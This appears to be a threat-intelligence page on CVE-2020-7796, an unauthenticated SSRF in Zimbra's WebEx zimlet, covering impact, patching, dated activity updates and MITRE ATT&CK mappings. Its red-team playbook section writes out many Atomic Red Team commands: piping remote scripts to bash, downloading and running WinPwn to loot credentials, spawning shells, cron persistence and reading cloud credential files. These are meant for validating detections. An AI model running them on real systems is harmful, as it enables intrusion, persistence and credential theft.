CVE-2020-7796

CRITICAL CISA KEV Pub 18/02 Upd 18/02

Overview

This vulnerability is a server-side request forgery (SSRF) flaw resulting from improper validation of user-supplied input in the WebEx zimlet component of Zimbra Collaboration Suite. The root cause lies in the zimlet's JSP endpoint which processes the 'companyId' parameter without adequate sanitization, enabling crafted HTTP requests to be sent from the server. The affected component is the com_zimbra_webex zimlet's httpPost.jsp within versions prior to 8.8.15 Patch 7.

Vulnerability Description

Zimbra Collaboration Suite (ZCS) before 8.8.15 Patch 7 allows SSRF when WebEx zimlet is installed and zimlet JSP is enabled.

Impact

An unauthenticated attacker can leverage this SSRF vulnerability to make arbitrary HTTP requests from the Zimbra server, potentially accessing internal resources or services not exposed externally. This can lead to unauthorized data disclosure or facilitate further attacks such as internal network reconnaissance and exploitation of trust relationships. No user interaction or authentication is required to exploit this flaw, increasing its severity in environments with exposed zimlet functionality.

Solution

Remediation involves upgrading Zimbra Collaboration Suite to version 8.8.15 Patch 7 or later, as detailed in the official Zimbra release notes at https://wiki.zimbra.com/wiki/Zimbra_Releases/8.8.15/P7. This patch addresses the SSRF vulnerability by correcting input validation in the WebEx zimlet JSP. Administrators should follow the vendor's patching instructions precisely to ensure the vulnerability is fully mitigated.

EPSS vs KEV Prediction — Evolution (30 days)

Full Analysis

The vulnerability in the Zimbra Collaboration Suite (ZCS) is characterized by a Server-Side Request Forgery (SSRF) flaw that arises when the WebEx zimlet is installed alongside the enabled zimlet JSP. This issue allows an attacker to manipulate the server into making requests to internal or external resources that the server has access to, potentially exposing sensitive information or services. The SSRF vulnerability is particularly concerning as it can be exploited without requiring authentication, allowing unauthenticated users to craft malicious requests that the server unwittingly executes. This flaw is exacerbated by the fact that many organizations rely on ZCS for critical collaboration and communication functions, making it a prime target for attackers.

Exploitation of this vulnerability can occur through various attack vectors. An attacker could leverage the WebEx zimlet to send crafted requests that target internal services, such as databases or internal APIs, which are typically not exposed to the public internet. For example, an attacker could retrieve sensitive data from a database management system or interact with internal services, leading to unauthorized access or data leakage. Additionally, the attacker could use the SSRF to perform port scanning on internal networks, identifying other vulnerable services that could be further exploited. This multi-faceted approach to exploitation underscores the severity of the vulnerability and the potential for significant damage.

The real-world impact of this vulnerability is profound, particularly for organizations that utilize ZCS for their operations. The high CVSS score of 9.8 indicates that the risk is critical, and successful exploitation could lead to severe consequences, including data breaches, unauthorized access to sensitive information, and potential compliance violations. The business risks associated with such incidents are substantial, encompassing financial losses, reputational damage, and the costs associated with incident response and remediation. Organizations may also face regulatory scrutiny if sensitive data is compromised, leading to further financial and operational repercussions.

To detect and mitigate this vulnerability, organizations should adopt a multi-layered approach. First, it is crucial to ensure that the Zimbra Collaboration Suite is updated to the latest version, specifically version 8.8.15 Patch 7 or later, which addresses this vulnerability. Regular patch management practices should be implemented to keep all software components up to date. Additionally, organizations should conduct thorough security assessments, including vulnerability scanning and penetration testing, to identify any potential exposure to SSRF vulnerabilities. Network segmentation can also be an effective strategy, limiting the ability of attackers to reach sensitive internal services even if they exploit the SSRF flaw.

In conclusion, the SSRF vulnerability in the Zimbra Collaboration Suite presents a significant threat to organizations that rely on this software for collaboration and communication. The potential for exploitation without authentication, coupled with the ability to access internal resources, makes this vulnerability particularly dangerous. Organizations must prioritize detection and mitigation strategies, including timely updates and robust security practices, to safeguard against the risks posed by this vulnerability. By taking proactive measures, businesses can protect their sensitive information and maintain the integrity of their operations in an increasingly complex threat landscape.




CSURFACE threat intelligence has identified a marked escalation in activity related to CVE-2020-7796, evidenced by its recent inclusion in the CISA Known Exploited Vulnerabilities (KEV) catalog. This formal recognition underscores the vulnerability’s criticality and signals increased attention from both defenders and potential adversaries. Concurrently, the CVSS score has been updated to 9.8, reflecting a reassessment of the vulnerability’s impact and exploitability, while the EPSS score has surged to 0.9285, indicating a high likelihood of exploitation in the near term. Our telemetry corroborates this trend, showing a sharp increase in detection activity, although no new exploit variants or ransomware affiliations have been observed to date. This shift elevates the threat level substantially, emphasizing that organizations using affected Zimbra Collaboration Suite versions face a heightened risk of server-side request forgery attacks that could facilitate unauthorized internal network access. The convergence of these factors demands increased vigilance from defenders, as the vulnerability’s exploitation potential is now both quantitatively and qualitatively more pronounced.



Update 2 — April 16, 2026

CSURFACE threat intelligence has detected a marked escalation in activity related to CVE-2020-7796, with telemetry indicating a doubling in detection frequency over a short interval. Although no novel exploit techniques or ransomware affiliations have surfaced, this increase signals a growing interest or opportunistic scanning targeting vulnerable Zimbra Collaboration Suite deployments. The sustained high EPSS score underscores the vulnerability’s persistent exploitability in the wild. For defenders, this trend elevates the urgency of monitoring for SSRF attempts leveraging the WebEx zimlet component, as attackers may be intensifying reconnaissance or preliminary exploitation efforts. Consequently, the threat level associated with this vulnerability has shifted from latent to actively exploited, warranting heightened situational awareness despite the absence of new exploit variants.



Update 3 — June 09, 2026

CSURFACE threat intelligence has identified a moderate uptick in activity exploiting CVE-2020-7796, reflected by a discernible increase in detection events and a slight rise in the EPSS score. This trend indicates that adversaries continue to probe and potentially leverage the SSRF vulnerability associated with the WebEx zimlet in Zimbra Collaboration Suite environments. Although no novel exploit variants have been documented, the persistence and incremental growth in exploitation attempts suggest sustained attacker interest and possible reconnaissance intensification. For defenders, this evolving landscape underscores the need for continued vigilance, as the vulnerability remains a viable vector for unauthorized access or lateral movement within affected networks. Consequently, the threat level is elevated from a dormant to a more active exploitation state, reinforcing the criticality of monitoring and response capabilities focused on SSRF activity linked to this vulnerability.



Update 4 — June 20, 2026

CSURFACE threat intelligence has detected a slight increase in activity linked to CVE-2020-7796, reflecting a modest resurgence in exploitation attempts targeting the Zimbra Collaboration Suite SSRF vulnerability. Although the EPSS score has marginally declined, indicating a subtle reduction in predicted exploit likelihood, our telemetry reveals a concurrent uptick in detection events, suggesting that adversaries may be intensifying reconnaissance or probing efforts rather than executing widespread attacks. This divergence between statistical exploit probability and observed activity highlights a nuanced threat environment where attackers maintain interest but have not significantly expanded operational use. For defenders, this means the vulnerability remains a pertinent risk requiring ongoing monitoring, as the increased probing could precede more aggressive exploitation phases. The overall threat level is adjusted to reflect sustained attacker engagement with a cautiously elevated alert posture, emphasizing the importance of vigilance despite the absence of new exploit variants or ransomware associations.



Update 5 — July 06, 2026

CSURFACE threat intelligence has detected a slight increase in probing activity targeting CVE-2020-7796, indicating sustained adversary interest in this critical Zimbra Collaboration Suite vulnerability. Although no new exploit variants or ransomware associations have surfaced, the uptick in detection frequency suggests attackers are continuing reconnaissance efforts, potentially preparing for more aggressive exploitation attempts. This persistent probing underscores the vulnerability’s attractiveness as an attack vector, particularly given its high severity rating and the presence of the WebEx zimlet component in affected environments. While the EPSS score remains stable and no rapid escalation in exploit development is evident, the observed telemetry trend warrants a cautiously elevated risk posture. Defenders should recognize that the vulnerability remains actively targeted, and the incremental increase in activity could presage a shift toward more impactful exploitation campaigns.



Update 6 — July 31, 2026

CSURFACE threat intelligence has detected a modest increase in activity targeting CVE-2020-7796, reflected by a slight uptick in telemetry despite a marginal decline in the EPSS score. This divergence suggests that while exploit attempts remain steady or are incrementally rising, the overall likelihood of widespread exploitation may be stabilizing or slightly diminishing. The absence of new exploit techniques or ransomware group involvement indicates that adversaries continue to probe this vulnerability primarily for reconnaissance or opportunistic access rather than coordinated campaigns. For defenders, this nuanced shift underscores the importance of maintaining vigilance, as persistent low-level targeting can precede more aggressive exploitation efforts. The risk level remains high due to the vulnerability’s critical severity and the presence of the WebEx zimlet, but the current data does not indicate an imminent surge in exploit sophistication or volume.



Update 7 — August 18, 2026

CSURFACE threat intelligence has detected a slight increase in activity related to CVE-2020-7796, indicating a modest rise in attempts to leverage this SSRF vulnerability in Zimbra Collaboration Suite environments where the WebEx zimlet is enabled. While the overall exploit landscape remains unchanged with no new proof-of-concept exploits or ransomware group involvement identified, this subtle uptick suggests continued adversary interest in probing this vector for opportunistic access. The stable EPSS score reinforces that the likelihood of exploitation remains consistently high, reflecting the vulnerability’s critical severity and persistent presence in targeted environments. For defenders, this development underscores the necessity of sustained monitoring and vigilance, as even minor increases in probing activity can precede more aggressive exploitation or integration into broader attack campaigns. The threat level remains elevated, with the incremental rise in detection activity signaling that adversaries have not deprioritized this vulnerability despite the absence of novel exploitation techniques.

Affected Products (8)

Vendor Product Version CPE
synacor Synacor Zimbra Collaboration Suite All cpe:2.3:a:synacor:zimbra_collaboration_suite:*:*:*:*:*:*:*:*
synacor Synacor Zimbra Collaboration Suite 8.8.15 cpe:2.3:a:synacor:zimbra_collaboration_suite:8.8.15:-:*:*:*:*:*:*
synacor Synacor Zimbra Collaboration Suite 8.8.15 cpe:2.3:a:synacor:zimbra_collaboration_suite:8.8.15:p1:*:*:*:*:*:*
synacor Synacor Zimbra Collaboration Suite 8.8.15 cpe:2.3:a:synacor:zimbra_collaboration_suite:8.8.15:p2:*:*:*:*:*:*
synacor Synacor Zimbra Collaboration Suite 8.8.15 cpe:2.3:a:synacor:zimbra_collaboration_suite:8.8.15:p3:*:*:*:*:*:*
synacor Synacor Zimbra Collaboration Suite 8.8.15 cpe:2.3:a:synacor:zimbra_collaboration_suite:8.8.15:p4:*:*:*:*:*:*
synacor Synacor Zimbra Collaboration Suite 8.8.15 cpe:2.3:a:synacor:zimbra_collaboration_suite:8.8.15:p5:*:*:*:*:*:*
synacor Synacor Zimbra Collaboration Suite 8.8.15 cpe:2.3:a:synacor:zimbra_collaboration_suite:8.8.15:p6:*:*:*:*:*:*

Exploits

No exploits found for this CVE.

Exploited in Wild CONFIRMED
Ransomware NOT ASSOCIATED
Attacker Interest MEDIUM
Sightings Few sightings

Threat Feed

16 events
2026-08-09
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-30
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-27
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-26
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-25
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-24
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-30
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-26
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-23
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-19
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-08
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-05-28
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-05-24
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-04-11
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-04-02
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-02-17
Added to CISA KEV Catalog

CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog

Likely Kill Chain

Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.

Applicable Out of scope
Initial Access
TA0001
Execution
TA0002
Persistence
TA0003
Priv. Escalation
TA0004
Defense Evasion
TA0005
Credential Access
TA0006
Lateral Movement
TA0008
Collection
TA0009
Impact
TA0040

Kill chain derived from the ML classifier.

Attack Vectors ML

Server-Side Request Forgery
100% ssrf

MITRE ATT&CK Techniques (6)

The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.

ID Name Stage Tactics Platforms Link
T1190 Exploit Public-Facing Application Initial Access initial-access Containers, ESXi, IaaS, Linux, macOS, Network Devices, Windows
T1053.003 Cron Kill Chain execution, persistence, privilege-escalation Linux, macOS, ESXi
T1059.004 Unix Shell Kill Chain execution ESXi, Linux, macOS, Network Devices
T1552.001 Credentials In Files Kill Chain credential-access Containers, IaaS, Linux, macOS, Windows
T1049 System Network Connections Discovery Kill Chain discovery Windows, IaaS, Linux, macOS, Network Devices, ESXi
T1021.004 SSH Kill Chain lateral-movement ESXi, Linux, macOS

CAPEC Attack Patterns ML

ID Name ML Conf. Likelihood Severity Link
CAPEC-664 Server Side Request Forgery
30%
High High

Red Team Playbook

47 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.

T1021.004 ESXi - Enable SSH via PowerCLI Windows PowerShell Privileged
An adversary enables the SSH service on a ESXi host to maintain persistent access to the host and to carryout subsequent operations.
Command (PowerShell)
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false 
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
T1021.004 ESXi - Enable SSH via VIM-CMD Windows CMD
An adversary enables SSH on an ESXi host to maintain persistence and creeate another command execution interface. [Reference](https://lolesxi-project.github.io/LOLESXi/lolesxi/Binaries/vim-cmd/#enable%20service)
Command (CMD)
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
T1049 System Discovery using SharpView Windows PowerShell Privileged
Get a listing of network connections, domains, domain users, and etc. sharpview.exe located in the bin folder, an opensource red-team tool. Upon successful execution, cmd.exe will execute sharpview.exe <method>. Results will output via stdout.
Command (PowerShell)
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
T1049 System Network Connections Discovery Windows CMD
Get a listing of network connections. Upon successful execution, cmd.exe will execute `netstat`, `net use` and `net sessions`. `net sessions` requires elevated privileges; on standard user accounts this command may not return results. Results will output via stdout.
Command (CMD)
netstat -ano
net use
net sessions 2>nul
T1049 System Network Connections Discovery FreeBSD, Linux & MacOS Linux, macOS Shell
Get a listing of network connections. Upon successful execution, sh will execute `netstat` and `who -a`. Results will output via stdout.
Command (Shell)
netstat
who -a
T1049 System Network Connections Discovery via PowerShell (Process Mapping) Windows PowerShell
Enumerate TCP connections and map to owning process names via PowerShell.
Command (PowerShell)
Get-NetTCPConnection | ForEach-Object {
  $p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
  [pscustomobject]@{
    Local   = "$($_.LocalAddress):$($_.LocalPort)"
    Remote  = "$($_.RemoteAddress):$($_.RemotePort)"
    State   = $_.State
    PID     = $_.OwningProcess
    Process = if ($p) { $p.ProcessName } else { $null }
  }
} | Sort-Object State,Process | Format-Table -AutoSize
T1049 System Network Connections Discovery via sockstat (Linux, FreeBSD) Linux Shell
Enumerate IPv4/IPv6 network endpoints on FreeBSD using sockstat.
Command (Shell)
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
T1049 System Network Connections Discovery via ss or lsof (Linux/MacOS) Linux, macOS Bash
List active TCP/UDP network connections using ss, with lsof as a fallback when ss is unavailable. Serves as an alternative to the netstat-based test.
Command (Bash)
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
T1049 System Network Connections Discovery with PowerShell Windows PowerShell
Get a listing of network connections. Upon successful execution, powershell.exe will execute `get-NetTCPConnection`. Results will output via stdout.
Command (PowerShell)
Get-NetTCPConnection
T1053.003 Cron - Add script to /etc/cron.d folder Linux Shell Privileged
This test adds a script to /etc/cron.d folder configured to execute on a schedule.
Command (Shell)
echo "#{command}" > /etc/cron.d/#{cron_script_name}
T1053.003 Cron - Add script to /var/spool/cron/crontabs/ folder Linux Bash Privileged
This test adds a script to a /var/spool/cron/crontabs folder configured to execute on a schedule. This technique was used by the threat actor Rocke during the exploitation of Linux web servers.
Command (Bash)
echo "#{command}" >> /var/spool/cron/crontabs/#{cron_script_name}
T1053.003 Cron - Add script to all cron subfolders Linux, macOS Bash Privileged
This test adds a script to /etc/cron.hourly, /etc/cron.daily, /etc/cron.monthly and /etc/cron.weekly folders configured to execute on a schedule. This technique was used by the threat actor Rocke during the exploitation of Linux web servers.
Command (Bash)
echo "#{command}" > /etc/cron.daily/#{cron_script_name}
echo "#{command}" > /etc/cron.hourly/#{cron_script_name}
echo "#{command}" > /etc/cron.monthly/#{cron_script_name}
echo "#{command}" > /etc/cron.weekly/#{cron_script_name}
T1053.003 Cron - Replace crontab with referenced file Linux, macOS Shell
This test replaces the current user's crontab file with the contents of the referenced file. This technique was used by numerous IoT automated exploitation attacks.
Command (Shell)
crontab -l > /tmp/notevil
echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron}
T1059.004 Change login shell Linux Bash Privileged
An adversary may want to use a different login shell. The chsh command changes the user login shell. The following test, creates an art user with a /bin/bash shell, changes the users shell to sh, then deletes the art user.
Command (Bash)
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
T1059.004 Command line scripts Linux Shell
An adversary may type in elaborate multi-line shell commands into a terminal session because they can't or don't wish to create script files on the host. The following command is a simple loop, echoing out Atomic Red Team was here!
Command (Shell)
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
T1059.004 Command-Line Interface Linux, macOS Shell
Using Curl to download and pipe a payload to Bash. NOTE: Curl-ing to Bash is generally a bad idea if you don't control the server. Upon successful execution, sh will download via curl and wget the specified payload (echo-art-fish.sh) and set a marker file in `/tmp/art-fish.txt`.
Command (Shell)
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
T1059.004 Create and Execute Bash Shell Script Linux, macOS Shell
Creates and executes a simple sh script.
Command (Shell)
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
T1059.004 Creating shell using cpan command Linux, macOS Shell
cpan lets you execute perl commands with the ! command. It can be used to break out from restricted environments by spawning an interactive system shell. Reference - https://gtfobins.github.io/gtfobins/cpan/
Command (Shell)
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1  cpan
T1059.004 Current kernel information enumeration Linux Shell
An adversary may want to enumerate the kernel information to tailor their attacks for that particular kernel. The following command will enumerate the kernel information.
Command (Shell)
uname -srm
T1059.004 Detecting pipe-to-shell Linux Shell
An adversary may develop a useful utility or subvert the CI/CD pipe line of a legitimate utility developer, who requires or suggests installing their utility by piping a curl download directly into bash. Of-course this is a very bad idea. The adversary may also take advantage...
Command (Shell)
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt      
T1059.004 Environment variable scripts Linux Shell
An adversary may place scripts in an environment variable because they can't or don't wish to create script files on the host. The following test, in a bash shell, exports the ART variable containing an echo command, then pipes the variable to /bin/bash
Command (Shell)
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
T1059.004 Harvest SUID executable files Linux Shell
AutoSUID application is the Open-Source project, the main idea of which is to automate harvesting the SUID executable files and to find a way for further escalating the privileges.
Command (Shell)
chmod +x #{autosuid}
bash #{autosuid}
T1059.004 LinEnum tool execution Linux Shell
LinEnum is a bash script that performs discovery commands for accounts,processes, kernel version, applications, services, and uses the information from these commands to present operator with ways of escalating privileges or further exploitation of targeted host.
Command (Shell)
chmod +x #{linenum}
bash #{linenum}
T1059.004 New script file in the tmp directory Linux Shell
An attacker may create script files in the /tmp directory using the mktemp utility and execute them. The following commands creates a temp file and places a pointer to it in the variable $TMPFILE, echos the string id into it, and then executes the file using bash, which...
Command (Shell)
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
T1059.004 Obfuscated command line scripts Linux Shell
An adversary may pre-compute the base64 representations of the terminal commands that they wish to execute in an attempt to avoid or frustrate detection. The following commands base64 encodes the text string id, then base64 decodes the string, then pipes it as a command to...
Command (Shell)
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
T1059.004 Shell Creation using awk command Linux, macOS Shell
In awk the begin rule runs the first record without reading or interpreting it. This way a shell can be created and used to break out from restricted environments with the awk command. Reference - https://gtfobins.github.io/gtfobins/awk/#shell
Command (Shell)
awk 'BEGIN {system("/bin/sh &")}'
T1059.004 Shell Creation using busybox command Linux Shell
BusyBox is a multi-call binary. A multi-call binary is an executable program that performs the same job as more than one utility program. It can be used to break out from restricted environments by spawning an interactive system shell. Reference -...
Command (Shell)
busybox sh &
T1059.004 What shell is running Linux Shell
An adversary will want to discover what shell is running so that they can tailor their attacks accordingly. The following commands will discover what shell is running.
Command (Shell)
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
T1059.004 What shells are available Linux Shell
An adversary may want to discover which shell's are available so that they might switch to that shell to tailor their attacks to suit that shell. The following commands will discover what shells are available on the host.
Command (Shell)
cat /etc/shells 
T1059.004 emacs spawning an interactive system shell Linux, macOS Shell Privileged
emacs can be used to break out from restricted environments by spawning an interactive system shell. Ref: https://gtfobins.github.io/gtfobins/emacs/
Command (Shell)
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
T1552.001 Access unattend.xml Windows CMD Privileged
Attempts to access unattend.xml, where credentials are commonly stored, within the Panther directory where installation logs are stored. If these files exist, their contents will be displayed. They are used to store credentials/answers during the unattended windows install process.
Command (CMD)
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
T1552.001 Extract Browser and System credentials with LaZagne macOS Bash Privileged
[LaZagne Source](https://github.com/AlessandroZ/LaZagne)
Command (Bash)
python2 laZagne.py all
T1552.001 Extract passwords with grep Linux, macOS Shell
Extracting credentials from files
Command (Shell)
grep -ri password #{file_path}
exit 0
T1552.001 Extracting passwords with findstr Windows PowerShell
Extracting Credentials from Files. Upon execution, the contents of files that contain the word "password" will be displayed.
Command (PowerShell)
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
T1552.001 Find AWS credentials Linux, macOS Shell
Find local AWS credentials from file, defaults to using / as the look path.
Command (Shell)
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
T1552.001 Find Azure credentials Linux, macOS Shell
Find local Azure credentials from file, defaults to using / as the look path.
Command (Shell)
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
T1552.001 Find GCP credentials Linux, macOS Shell
Find local Google Cloud Platform credentials from file, defaults to using / as the look path.
Command (Shell)
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
T1552.001 Find OCI credentials Linux, macOS Shell
Find local Oracle cloud credentials from file, defaults to using / as the look path.
Command (Shell)
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
T1552.001 Find and Access Github Credentials Linux, macOS Bash
This test looks for .netrc files (which stores github credentials in clear text )and dumps its contents if found.
Command (Bash)
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
T1552.001 List Credential Files via Command Prompt Windows CMD Privileged
Via Command Prompt,list files where credentials are stored in Windows Credential Manager
Command (CMD)
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
T1552.001 List Credential Files via PowerShell Windows PowerShell Privileged
Via PowerShell,list files where credentials are stored in Windows Credential Manager
Command (PowerShell)
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
T1552.001 WinPwn - Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials Windows PowerShell
Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials technique via function of WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive  
T1552.001 WinPwn - SessionGopher Windows PowerShell
Launches SessionGopher on this system via WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
T1552.001 WinPwn - Snaffler Windows PowerShell
Check Domain Network-Shares for cleartext passwords using Snaffler function of WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
T1552.001 WinPwn - passhunt Windows PowerShell
Search for Passwords on this system using passhunt via WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
T1552.001 WinPwn - powershellsensitive Windows PowerShell
Check Powershell event logs for credentials or other sensitive information via winpwn powershellsensitive function.
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
T1552.001 WinPwn - sensitivefiles Windows PowerShell
Search for sensitive files on this local system using the SensitiveFiles function of WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput

Detection & Response Rules

No detection or response rules found for this CVE.

No news articles found for this CVE.

References (3)

Title Tags URL
nvd.nist.gov
NVD reference
https://nvd.nist.gov/vuln/detail/CVE-2020-7796
wiki.zimbra.com
GitHub CVE x_refsource_CONFIRM
https://wiki.zimbra.com/wiki/Zimbra_Releases/8.8.15/P7
cisa.gov
NVD API US Government Resource
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2020-7796